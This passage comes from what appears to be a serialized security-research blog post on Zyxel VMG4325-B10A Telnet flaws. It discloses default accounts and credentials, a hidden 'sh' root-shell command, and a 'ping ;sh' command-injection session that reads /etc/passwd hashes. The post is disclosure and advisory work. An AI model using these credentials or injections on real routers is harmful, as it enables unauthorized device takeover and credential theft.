"class":1375,"line":4835},[1373,56556,56557],{"class":1383},"    \u003C\u002F",[1373,56559,56471],{"class":6300},[1373,56561,6765],{"class":1383},[1373,56563,56564,56566,56568,56571,56573,56575,56577,56579,56582,56584],{"class":1375,"line":4843},[1373,56565,8246],{"class":1383},[1373,56567,56471],{"class":6300},[1373,56569,56570],{"class":8252}," nextInstance",[1373,56572,5417],{"class":1383},[1373,56574,183],{"class":1387},[1373,56576,353],{"class":1391},[1373,56578,183],{"class":1387},[1373,56580,56581],{"class":1383}," >\u003C\u002F",[1373,56583,56471],{"class":6300},[1373,56585,6765],{"class":1383},[1373,56587,56588,56590,56592],{"class":1375,"line":4849},[1373,56589,46627],{"class":1383},[1373,56591,56399],{"class":6300},[1373,56593,6765],{"class":1383},[1373,56595,56596,56598,56600,56602,56604,56606,56608,56610],{"class":1375,"line":4877},[1373,56597,11852],{"class":1383},[1373,56599,56399],{"class":6300},[1373,56601,56402],{"class":8252},[1373,56603,5417],{"class":1383},[1373,56605,183],{"class":1387},[1373,56607,353],{"class":1391},[1373,56609,183],{"class":1387},[1373,56611,6765],{"class":1383},[1373,56613,56614,56616,56619,56621,56623,56625,56627],{"class":1375,"line":4915},[1373,56615,8246],{"class":1383},[1373,56617,56618],{"class":6300},"GroupKey",[1373,56620,5384],{"class":1383},[1373,56622,353],{"class":4640},[1373,56624,46627],{"class":1383},[1373,56626,56618],{"class":6300},[1373,56628,6765],{"class":1383},[1373,56630,56631,56633,56635,56637,56639,56641,56643],{"class":1375,"line":4931},[1373,56632,8246],{"class":1383},[1373,56634,56419],{"class":6300},[1373,56636,5384],{"class":1383},[1373,56638,56424],{"class":4640},[1373,56640,46627],{"class":1383},[1373,56642,56419],{"class":6300},[1373,56644,6765],{"class":1383},[1373,56646,56647,56649,56651,56653,56656,56658,56660],{"class":1375,"line":4947},[1373,56648,8246],{"class":1383},[1373,56650,30775],{"class":6300},[1373,56652,5384],{"class":1383},[1373,56654,56655],{"class":4640},"User",[1373,56657,4
6627],{"class":1383},[1373,56659,30775],{"class":6300},[1373,56661,6765],{"class":1383},[1373,56663,56664,56666,56668,56670,56672,56674,56676],{"class":1375,"line":4952},[1373,56665,8246],{"class":1383},[1373,56667,56454],{"class":6300},[1373,56669,5384],{"class":1383},[1373,56671,353],{"class":4640},[1373,56673,46627],{"class":1383},[1373,56675,56454],{"class":6300},[1373,56677,6765],{"class":1383},[1373,56679,56680,56682,56684,56686,56688,56690,56692,56694],{"class":1375,"line":6776},[1373,56681,8246],{"class":1383},[1373,56683,56471],{"class":6300},[1373,56685,56402],{"class":8252},[1373,56687,5417],{"class":1383},[1373,56689,183],{"class":1387},[1373,56691,467],{"class":1391},[1373,56693,183],{"class":1387},[1373,56695,6765],{"class":1383},[1373,56697,56698,56700,56702,56704,56707,56709,56711],{"class":1375,"line":6781},[1373,56699,8246],{"class":1383},[1373,56701,56490],{"class":6300},[1373,56703,5384],{"class":1383},[1373,56705,56706],{"class":4640},"zyuser",[1373,56708,46627],{"class":1383},[1373,56710,56490],{"class":6300},[1373,56712,6765],{"class":1383},[1373,56714,56715,56717,56719,56721,56723,56725,56727],{"class":1375,"line":7524},[1373,56716,8246],{"class":1383},[1373,56718,56507],{"class":6300},[1373,56720,5384],{"class":1383},[1373,56722,56512],{"class":4640},[1373,56724,46627],{"class":1383},[1373,56726,56507],{"class":6300},[1373,56728,6765],{"class":1383},[1373,56730,56731,56733,56735,56737,56739,56741,56743],{"class":1375,"line":7530},[1373,56732,8246],{"class":1383},[1373,56734,56525],{"class":6300},[1373,56736,5384],{"class":1383},[1373,56738,445],{"class":4640},[1373,56740,46627],{"class":1383},[1373,56742,56525],{"class":6300},[1373,56744,6765],{"class":1383},[1373,56746,56747,56749,56751,56753,56755,56757,56759],{"class":1375,"line":7546},[1373,56748,8246],{"class":1383},[1373,56750,56542],{"class":6300},[1373,56752,5384],{"class":1383},[1373,56754,467],{"class":4640},[1373,56756,46627],{"class":1383},[1373,56758,56542],{"class":6300},[1373,
56760,6765],{"class":1383},[1373,56762,56763,56765,56767],{"class":1375,"line":7571},[1373,56764,56557],{"class":1383},[1373,56766,56471],{"class":6300},[1373,56768,6765],{"class":1383},[1373,56770,56771,56773,56775,56777,56779,56781,56783,56785,56787,56789],{"class":1375,"line":7598},[1373,56772,8246],{"class":1383},[1373,56774,56471],{"class":6300},[1373,56776,56570],{"class":8252},[1373,56778,5417],{"class":1383},[1373,56780,183],{"class":1387},[1373,56782,353],{"class":1391},[1373,56784,183],{"class":1387},[1373,56786,56581],{"class":1383},[1373,56788,56471],{"class":6300},[1373,56790,6765],{"class":1383},[1373,56792,56793,56795,56797],{"class":1375,"line":7615},[1373,56794,46627],{"class":1383},[1373,56796,56399],{"class":6300},[1373,56798,6765],{"class":1383},[1373,56800,56801,56803,56805,56807,56809,56811,56813,56815,56817,56819],{"class":1375,"line":7635},[1373,56802,11852],{"class":1383},[1373,56804,56399],{"class":6300},[1373,56806,56570],{"class":8252},[1373,56808,5417],{"class":1383},[1373,56810,183],{"class":1387},[1373,56812,491],{"class":1391},[1373,56814,183],{"class":1387},[1373,56816,56581],{"class":1383},[1373,56818,56399],{"class":6300},[1373,56820,6765],{"class":1383},[1373,56822,56823,56825,56827],{"class":1375,"line":7640},[1373,56824,46627],{"class":1383},[1373,56826,56337],{"class":6300},[1373,56828,6765],{"class":1383},[18,56830,56831],{},"As shown above, the VMG4325-B10A is provisioned with three accounts:",[1789,56833,56834,56836,56839],{},[25,56835,55060],{},[25,56837,56838],{},"admin:1234",[25,56840,55064],{},[18,56842,2245,56843,56845,56846,56851,56852,56857,56858,56860],{},[886,56844,56351],{}," credentials were previously documented under ",[47,56847,56850],{"href":56848,"rel":56849},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2017-18371",[51],"CVE-2017-18371",", but that CVE currently only associates the account with 
",[47,56853,56856],{"href":56854,"rel":56855},"https:\u002F\u002Fwww.amazon.com\u002FZyxel-ADSL-Wireless-Gateway-P660HN-51\u002Fdp\u002FB0051SHXPQ",[51],"Zyxel P660HN-51"," routers. However, we now see this vulnerability extending to the VMG series as well. The functionality of the ",[886,56859,56351],{}," user is poorly documented by CVE-2017-18371, so before proceeding, we’ll take a quick detour to explore it further.",[18,56862,56863,56864,56866,56867,56869,56870,56872,56873,4606],{},"These credentials are not visible via the web interface; notably, the ",[886,56865,56351],{}," account has additional functionality in the Telnet interface.  As previously discussed, ",[886,56868,55366],{}," handles Telnet commands. If the standard ",[886,56871,55370],{}," does not recognize a command, it falls back to the aptly named ",[886,56874,56875],{},"cli_processHiddenCmd",[18,56877,56878],{},[68,56879],{":width":10862,"alt":56880,"src":56881},"Decompiled Process Hidden Command Call","\u002Fblog\u002Fzyxel-telnet-vulns\u002FhiddenCmd.png",[18,56883,56884,56886,56887,56889],{},[886,56885,56875],{}," handles a list of commands that are not listed in the ",[886,56888,39134],{}," menu and are only available to the supervisor user. 
While the list of hidden commands is short, it includes several powerful options:",[1789,56891,56892,56895,56898,56901,56904,56907],{},[25,56893,56894],{},"dumpmem",[25,56896,56897],{},"ebtables",[25,56899,56900],{},"iptables",[25,56902,56903],{},"logread",[25,56905,56906],{},"setmem",[25,56908,2186],{},[18,56910,5623,56911,56913,56914,56916],{},[886,56912,2186],{}," command provides a fully interactive ",[886,56915,55791],{}," shell, granting the user unrestricted access to the system.",[1354,56918,56920],{"className":55473,"code":56919,"language":55475,"meta":219,"style":219},"albinolobster@mournland:~\u002Fresearch\u002Fmisc-exploits$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: supervisor\nPassword:\n > sh\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n#\n",[886,56921,56922,56931,56937,56945,56961,56967,56974,56978,56984,56988,56992,57010,57032,57036],{"__ignoreMap":219},[1373,56923,56924,56927,56929],{"class":1375,"line":1376},[1373,56925,56926],{"class":2206},"albinolobster@mournland:~\u002Fresearch\u002Fmisc-exploits$",[1373,56928,55485],{"class":1391},[1373,56930,55488],{"class":5467},[1373,56932,56933,56935],{"class":1375,"line":220},[1373,56934,55493],{"class":2206},[1373,56936,55496],{"class":1391},[1373,56938,56939,56941,56943],{"class":1375,"line":1266},[1373,56940,19141],{"class":2206},[1373,56942,55503],{"class":1391},[1373,56944,55506],{"class":1391},[1373,56946,56947,56949,56951,56953,56955,56957,56959],{"class":1375,"line":1852},[1373,56948,55511],{"class":2206},[1373,56950,55514],{"class":1391},[1373,56952,55517],{"class":1391},[1373,56954,4713],{"class":1387},[1373,56956,55522],{"class":1391},[1373,56958,1388],{"class":1387},[1373,56960,55527],{"class":1391},[1373,56962,56963,56965],{"class":1375,"line":4692},[1373,56964,55532],{"class":2206},[1373,56966,55535],{"class":1391},[1373,56968,56969,56971
],{"class":1375,"line":4724},[1373,56970,55540],{"class":2206},[1373,56972,56973],{"class":1391}," supervisor\n",[1373,56975,56976],{"class":1375,"line":4756},[1373,56977,55548],{"class":2206},[1373,56979,56980,56982],{"class":1375,"line":4768},[1373,56981,11741],{"class":1397},[1373,56983,55563],{"class":2206},[1373,56985,56986],{"class":1375,"line":4792},[1373,56987,6520],{"emptyLinePlaceholder":237},[1373,56989,56990],{"class":1375,"line":4798},[1373,56991,6520],{"emptyLinePlaceholder":237},[1373,56993,56994,56996,56998,57000,57002,57004,57006,57008],{"class":1375,"line":4806},[1373,56995,55585],{"class":2206},[1373,56997,55588],{"class":1391},[1373,56999,55591],{"class":4640},[1373,57001,55594],{"class":1391},[1373,57003,55597],{"class":1391},[1373,57005,55788],{"class":4640},[1373,57007,55791],{"class":2206},[1373,57009,11875],{"class":4640},[1373,57011,57012,57014,57016,57018,57020,57022,57024,57026,57028,57030],{"class":1375,"line":4817},[1373,57013,55798],{"class":2206},[1373,57015,4713],{"class":1387},[1373,57017,39134],{"class":1391},[1373,57019,1388],{"class":1387},[1373,57021,55807],{"class":1391},[1373,57023,52105],{"class":1391},[1373,57025,55812],{"class":1391},[1373,57027,55815],{"class":1391},[1373,57029,55818],{"class":1391},[1373,57031,55821],{"class":1391},[1373,57033,57034],{"class":1375,"line":4825},[1373,57035,6520],{"emptyLinePlaceholder":237},[1373,57037,57038],{"class":1375,"line":4835},[1373,57039,56298],{"class":4630},[18,57041,36341,57042,57044,57045,57047],{},[886,57043,56351],{}," has hidden privileges and access to undocumented functionality, the provisioned ",[886,57046,56706],{}," is different. 
It is not a concealed account with secret commands but instead appears to be a secondary user with elevated privileges, despite being fully visible in the user table.",[18,57049,57050],{},[68,57051],{":width":10862,"alt":55426,"src":57052},"\u002Fblog\u002Fzyxel-telnet-vulns\u002Fusertable.png",[18,57054,57055,57056,57058,57059,59],{},"The web interface even prompts for a password change upon logging in as ",[886,57057,56706],{},", but given the lack of a clear purpose for this redundant account, it's unlikely that many users bother to reset the password. Attackers, however, have certainly taken notice. Our colleagues at GreyNoise have observed activity targeting this account, and notably, its credentials were also used by ",[47,57060,57063],{"href":57061,"rel":57062},"https:\u002F\u002Fgithub.com\u002FJeremyNGalloway\u002Fmod_plaintext.py\u002Fblob\u002Fmaster\u002Fmod_plaintext.py",[51],"BrickerBot",[18,57065,57066],{},"Undocumented, or poorly documented, default accounts with easily guessable passwords that are unlikely to be changed pose a significant security risk. We were unable to find an official manual for the VMG4325-B10A beyond a 2012 version and 2015 release notes, neither of which mention the zyuser account, leaving little to no documentation on its existence.",[18,57068,57069,57070,57075,57076,57078],{},"While it may not be a popular stance, ",[47,57071,57074],{"href":57072,"rel":57073},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F1392.html",[51],"CWE-1392"," (Use of Default Credentials) exists for a reason. Given that the ",[886,57077,55064],{}," credentials ultimately enable full remote code execution via CVE-2024-40891, we believe it is reasonable to assign this issue its own identifier: CVE-2025-0890.",[18,57080,57081,57082,57084,57085,57087],{},"To reiterate, the ",[886,57083,56706],{}," account cannot use the hidden ",[886,57086,2186],{}," command via Telnet. 
Instead, it can only achieve code execution through the command injection (CVE-2024-40891).",[1354,57089,57091],{"className":55473,"code":57090,"language":55475,"meta":219,"style":219},"albinolobster@mournland:~$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: zyuser\nPassword:\n > sh\ntelnetd:error:694.808:processInput:472:unrecognized command sh\n > ping ;sh\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.\n\nUsage: ping [OPTIONS] HOST\n\nSend ICMP ECHO_REQUEST packets to network hosts\n\nOptions:\n     -4, -6       Force IP or IPv6 name resolution\n     -c CNT       Send only CNT pings\n     -s SIZE      Send SIZE data bytes in packets (default:56)\n     -I IFACE\u002FIP  Use interface or IP address as source\n     -W SEC       Seconds to wait for the first response (default:10)\n                     (after all -c CNT packets are sent)\n     -w SEC       Seconds until ping exits (default:infinite)\n                     (can exit earlier with -c CNT)\n     -q           Quiet, only displays output at start\n                     and when finished\n\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# cat \u002Fetc\u002Fpasswd\nsupervisor:gNvaS9TkEwk..:0:0:Administrator:\u002F:\u002Fbin\u002Fsh\nnobody:Mm\u002FNWrZmKMrT2:99:99:nobody for 
ftp:\u002F:\u002Fbin\u002Ffalse\nadmin:d7uXUhqhH7hew:100:0:Administrator:\u002F:\u002Fbin\u002Fsh\nzyuser:hH7gnvw0ISLfg:101:2:User:\u002F:\u002Fbin\u002Fsh\n",[886,57092,57093,57101,57107,57115,57131,57137,57143,57147,57153,57162,57175,57189,57193,57202,57206,57228,57232,57236,57261,57280,57307,57334,57364,57389,57409,57431,57453,57464,57468,57472,57476,57494,57516,57520,57525,57530,57543,57548],{"__ignoreMap":219},[1373,57094,57095,57097,57099],{"class":1375,"line":1376},[1373,57096,55482],{"class":2206},[1373,57098,55485],{"class":1391},[1373,57100,55488],{"class":5467},[1373,57102,57103,57105],{"class":1375,"line":220},[1373,57104,55493],{"class":2206},[1373,57106,55496],{"class":1391},[1373,57108,57109,57111,57113],{"class":1375,"line":1266},[1373,57110,19141],{"class":2206},[1373,57112,55503],{"class":1391},[1373,57114,55506],{"class":1391},[1373,57116,57117,57119,57121,57123,57125,57127,57129],{"class":1375,"line":1852},[1373,57118,55511],{"class":2206},[1373,57120,55514],{"class":1391},[1373,57122,55517],{"class":1391},[1373,57124,4713],{"class":1387},[1373,57126,55522],{"class":1391},[1373,57128,1388],{"class":1387},[1373,57130,55527],{"class":1391},[1373,57132,57133,57135],{"class":1375,"line":4692},[1373,57134,55532],{"class":2206},[1373,57136,55535],{"class":1391},[1373,57138,57139,57141],{"class":1375,"line":4724},[1373,57140,55540],{"class":2206},[1373,57142,55543],{"class":1391},[1373,57144,57145],{"class":1375,"line":4756},[1373,57146,55548],{"class":2206},[1373,57148,57149,57151],{"class":1375,"line":4768},[1373,57150,11741],{"class":1397},[1373,57152,55563],{"class":2206},[1373,57154,57155,57158,57160],{"class":1375,"line":4792},[1373,57156,57157],{"class":2206},"telnetd:error:694.808:processInput:472:unrecognized",[1373,57159,16726],{"class":1391},[1373,57161,55563],{"class":1391},[1373,57163,57164,57166,57169,57172],{"class":1375,"line":4798},[1373,57165,11741],{"class":1397},[1373,57167,57168],{"class":2206}," 
ping",[1373,57170,57171],{"class":1383}," ;",[1373,57173,57174],{"class":2206},"sh\n",[1373,57176,57177,57179,57181,57183,57185,57187],{"class":1375,"line":4806},[1373,57178,55585],{"class":2206},[1373,57180,55588],{"class":1391},[1373,57182,55591],{"class":4640},[1373,57184,55594],{"class":1391},[1373,57186,55597],{"class":1391},[1373,57188,55600],{"class":4640},[1373,57190,57191],{"class":1375,"line":4817},[1373,57192,6520],{"emptyLinePlaceholder":237},[1373,57194,57195,57197,57199],{"class":1375,"line":4825},[1373,57196,55609],{"class":2206},[1373,57198,57168],{"class":1391},[1373,57200,57201],{"class":4640}," [OPTIONS] HOST\n",[1373,57203,57204],{"class":1375,"line":4835},[1373,57205,6520],{"emptyLinePlaceholder":237},[1373,57207,57208,57211,57214,57217,57220,57222,57225],{"class":1375,"line":4843},[1373,57209,57210],{"class":2206},"Send",[1373,57212,57213],{"class":1391}," ICMP",[1373,57215,57216],{"class":1391}," ECHO_REQUEST",[1373,57218,57219],{"class":1391}," packets",[1373,57221,55503],{"class":1391},[1373,57223,57224],{"class":1391}," network",[1373,57226,57227],{"class":1391}," hosts\n",[1373,57229,57230],{"class":1375,"line":4849},[1373,57231,6520],{"emptyLinePlaceholder":237},[1373,57233,57234],{"class":1375,"line":4877},[1373,57235,55651],{"class":2206},[1373,57237,57238,57241,57244,57247,57250,57253,57256,57258],{"class":1375,"line":4915},[1373,57239,57240],{"class":2206},"     -4,",[1373,57242,57243],{"class":2209}," -6",[1373,57245,57246],{"class":1391},"       Force",[1373,57248,57249],{"class":1391}," IP",[1373,57251,57252],{"class":1391}," or",[1373,57254,57255],{"class":1391}," IPv6",[1373,57257,46496],{"class":1391},[1373,57259,57260],{"class":1391}," resolution\n",[1373,57262,57263,57266,57269,57272,57275,57277],{"class":1375,"line":4931},[1373,57264,57265],{"class":2206},"     -c",[1373,57267,57268],{"class":1391}," CNT",[1373,57270,57271],{"class":1391},"       Send",[1373,57273,57274],{"class":1391}," 
only",[1373,57276,57268],{"class":1391},[1373,57278,57279],{"class":1391}," pings\n",[1373,57281,57282,57285,57288,57291,57293,57296,57299,57302,57304],{"class":1375,"line":4947},[1373,57283,57284],{"class":2206},"     -s",[1373,57286,57287],{"class":1391}," SIZE",[1373,57289,57290],{"class":1391},"      Send",[1373,57292,57287],{"class":1391},[1373,57294,57295],{"class":1391}," data",[1373,57297,57298],{"class":1391}," bytes",[1373,57300,57301],{"class":1391}," in",[1373,57303,57219],{"class":1391},[1373,57305,57306],{"class":4640}," (default:56)\n",[1373,57308,57309,57312,57315,57318,57321,57323,57325,57328,57331],{"class":1375,"line":4952},[1373,57310,57311],{"class":2206},"     -I",[1373,57313,57314],{"class":1391}," IFACE\u002FIP",[1373,57316,57317],{"class":1391},"  Use",[1373,57319,57320],{"class":1391}," interface",[1373,57322,57252],{"class":1391},[1373,57324,57249],{"class":1391},[1373,57326,57327],{"class":1391}," address",[1373,57329,57330],{"class":1391}," as",[1373,57332,57333],{"class":1391}," source\n",[1373,57335,57336,57339,57342,57345,57347,57350,57352,57355,57358,57361],{"class":1375,"line":6776},[1373,57337,57338],{"class":2206},"     -W",[1373,57340,57341],{"class":1391}," SEC",[1373,57343,57344],{"class":1391},"       Seconds",[1373,57346,55503],{"class":1391},[1373,57348,57349],{"class":1391}," wait",[1373,57351,55807],{"class":1391},[1373,57353,57354],{"class":1391}," the",[1373,57356,57357],{"class":1391}," first",[1373,57359,57360],{"class":1391}," response",[1373,57362,57363],{"class":4640}," (default:10)\n",[1373,57365,57366,57369,57372,57375,57377,57379,57381,57384,57387],{"class":1375,"line":6781},[1373,57367,57368],{"class":1383},"                     (",[1373,57370,57371],{"class":2206},"after",[1373,57373,57374],{"class":1391}," all",[1373,57376,45587],{"class":2209},[1373,57378,57268],{"class":1391},[1373,57380,57219],{"class":1391},[1373,57382,57383],{"class":1391}," are",[1373,57385,57386],{"class":1391}," 
sent",[1373,57388,11875],{"class":1383},[1373,57390,57391,57394,57396,57398,57401,57403,57406],{"class":1375,"line":7524},[1373,57392,57393],{"class":2206},"     -w",[1373,57395,57341],{"class":1391},[1373,57397,57344],{"class":1391},[1373,57399,57400],{"class":1391}," until",[1373,57402,57168],{"class":1391},[1373,57404,57405],{"class":1391}," exits",[1373,57407,57408],{"class":4640}," (default:infinite)\n",[1373,57410,57411,57413,57416,57419,57422,57425,57427,57429],{"class":1375,"line":7530},[1373,57412,57368],{"class":1383},[1373,57414,57415],{"class":2206},"can",[1373,57417,57418],{"class":1391}," exit",[1373,57420,57421],{"class":1391}," earlier",[1373,57423,57424],{"class":1391}," with",[1373,57426,45587],{"class":2209},[1373,57428,57268],{"class":1391},[1373,57430,11875],{"class":1383},[1373,57432,57433,57436,57439,57441,57444,57447,57450],{"class":1375,"line":7546},[1373,57434,57435],{"class":2206},"     -q",[1373,57437,57438],{"class":1391},"           Quiet,",[1373,57440,57274],{"class":1391},[1373,57442,57443],{"class":1391}," displays",[1373,57445,57446],{"class":1391}," output",[1373,57448,57449],{"class":1391}," at",[1373,57451,57452],{"class":1391}," start\n",[1373,57454,57455,57458,57461],{"class":1375,"line":7571},[1373,57456,57457],{"class":2206},"                     and",[1373,57459,57460],{"class":1391}," when",[1373,57462,57463],{"class":1391}," 
finished\n",[1373,57465,57466],{"class":1375,"line":7598},[1373,57467,6520],{"emptyLinePlaceholder":237},[1373,57469,57470],{"class":1375,"line":7615},[1373,57471,6520],{"emptyLinePlaceholder":237},[1373,57473,57474],{"class":1375,"line":7635},[1373,57475,6520],{"emptyLinePlaceholder":237},[1373,57477,57478,57480,57482,57484,57486,57488,57490,57492],{"class":1375,"line":7640},[1373,57479,55585],{"class":2206},[1373,57481,55588],{"class":1391},[1373,57483,55591],{"class":4640},[1373,57485,55594],{"class":1391},[1373,57487,55597],{"class":1391},[1373,57489,55788],{"class":4640},[1373,57491,55791],{"class":2206},[1373,57493,11875],{"class":4640},[1373,57495,57496,57498,57500,57502,57504,57506,57508,57510,57512,57514],{"class":1375,"line":7648},[1373,57497,55798],{"class":2206},[1373,57499,4713],{"class":1387},[1373,57501,39134],{"class":1391},[1373,57503,1388],{"class":1387},[1373,57505,55807],{"class":1391},[1373,57507,52105],{"class":1391},[1373,57509,55812],{"class":1391},[1373,57511,55815],{"class":1391},[1373,57513,55818],{"class":1391},[1373,57515,55821],{"class":1391},[1373,57517,57518],{"class":1375,"line":7672},[1373,57519,6520],{"emptyLinePlaceholder":237},[1373,57521,57522],{"class":1375,"line":7688},[1373,57523,57524],{"class":4630},"# cat \u002Fetc\u002Fpasswd\n",[1373,57526,57527],{"class":1375,"line":7709},[1373,57528,57529],{"class":2206},"supervisor:gNvaS9TkEwk..:0:0:Administrator:\u002F:\u002Fbin\u002Fsh\n",[1373,57531,57532,57535,57537,57540],{"class":1375,"line":7714},[1373,57533,57534],{"class":2206},"nobody:Mm\u002FNWrZmKMrT2:99:99:nobody",[1373,57536,55807],{"class":1391},[1373,57538,57539],{"class":1391}," 
ftp:\u002F:\u002Fbin\u002F",[1373,57541,57542],{"class":7054},"false\n",[1373,57544,57545],{"class":1375,"line":7722},[1373,57546,57547],{"class":2206},"admin:d7uXUhqhH7hew:100:0:Administrator:\u002F:\u002Fbin\u002Fsh\n",[1373,57549,57550],{"class":1375,"line":9903},[1373,57551,57552],{"class":2206},"zyuser:hH7gnvw0ISLfg:101:2:User:\u002F:\u002Fbin\u002Fsh\n",[1920,57554,57556],{"id":57555},"overlap-with-existing-research","Overlap with Existing Research",[18,57558,57559],{},"While finalizing this blog, VulnCheck conducted a final search for other work that might overlap with our research. We’ve identified three notable overlaps that align with or reinforce our findings:",[22,57561,57562,57589,57604],{},[25,57563,57564,57565,57570,57571,57576,57577,57582,57583,57588],{},"A chunk of the code for the Telnet service has been available on GitHub for 12 years, and it even includes the ",[47,57566,57569],{"href":57567,"rel":57568},"https:\u002F\u002Fgithub.com\u002Fad7843\u002Fhi\u002Fblob\u002F8cc9b776ffef2c725c666dc0208031e03e6b85ed\u002Fcli.c#L396",[51],"hidden command logic",". 
It’s notable that talented researcher Jang Nguyen (aka ",[47,57572,57575],{"href":57573,"rel":57574},"https:\u002F\u002Fgithub.com\u002Ftestanull",[51],"testanull",", aka ",[47,57578,57581],{"href":57579,"rel":57580},"https:\u002F\u002Fx.com\u002Ftestanull",[51],"@testanull",") has a ",[47,57584,57587],{"href":57585,"rel":57586},"https:\u002F\u002Fgithub.com\u002Ftestanull\u002Fhi",[51],"fork"," of this repository.",[25,57590,57591,57592,57597,57598,57603],{},"In May 2023, NCCGroup published a blog titled, “",[47,57593,57596],{"href":57594,"rel":57595},"https:\u002F\u002Fwww.nccgroup.com\u002Fus\u002Fresearch-blog\u002Fnetgear-routers-a-playground-for-hackers\u002F",[51],"NETGEAR Routers: A Playground for Hackers?","” in which they describe the ",[47,57599,57602],{"href":57600,"rel":57601},"https:\u002F\u002Fwww.nccgroup.com\u002Fus\u002Fresearch-blog\u002Fnetgear-routers-a-playground-for-hackers\u002F#psv-2023-0008---telnet-default-account-privilege-escalation-breakout",[51],"authenticated command injection"," affecting the NETGEAR Nighthawk WiFi 6 Router (RAX30 AX2400). No CVE was assigned.",[25,57605,57606,57607,57612,57613,57620,57621,57623,57624,57626],{},"In July 2024, ",[47,57608,57611],{"href":57609,"rel":57610},"https:\u002F\u002Fgithub.com\u002Fkukas",[51],"Jirka Balhar"," published a blog titled, “",[47,57614,57617],{"href":57615,"rel":57616},"https:\u002F\u002Fblog.jirkabalhar.cz\u002F2024\u002F07\u002Fgaining-a-full-admin-shell-on-a-zyxel-gateway\u002F",[51],[1131,57618,57619],{},"Getting admin shell on a Zyxel gateway","” in which they describe using the ",[886,57622,5800],{}," account to invoke the hidden ",[886,57625,2186],{}," command on the Zyxel SBG3300. No CVE was assigned.",[1920,57628,1903],{"id":1902},[18,57630,57631],{},"The device’s default accounts and command injection vulnerabilities present a serious security risk, especially given their continued exploitation in the wild, as confirmed by GreyNoise. 
While these devices are aging and supposed to be out of support, thousands remain exposed online. The combination of default credentials and command injection makes them easy targets, highlighting the dangers of insecure default configurations and poor vulnerability transparency. Unsupported does not mean unexploited, and this research underscores the lasting impact of insecure legacy devices.",[61,57633,202],{"id":201},[18,57635,53821,57636,1246,57639,1246,57642,1255,57645],{},[47,57637,40447],{"href":53829,"rel":57638},[51],[47,57640,36637],{"href":53833,"rel":57641},[51],[47,57643,55229],{"href":53837,"rel":57644},[51],[47,57646,22211],{"href":53842,"rel":57647},[51],[18,57649,53846,57650,53850,57653,982,57656,1260],{},[47,57651,1233],{"href":2871,"rel":57652},[51],[47,57654,1245],{"href":45535,"rel":57655},[51],[47,57657,216],{"href":214,"rel":57658},[51],[2901,57660,57661],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki 
.swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: 
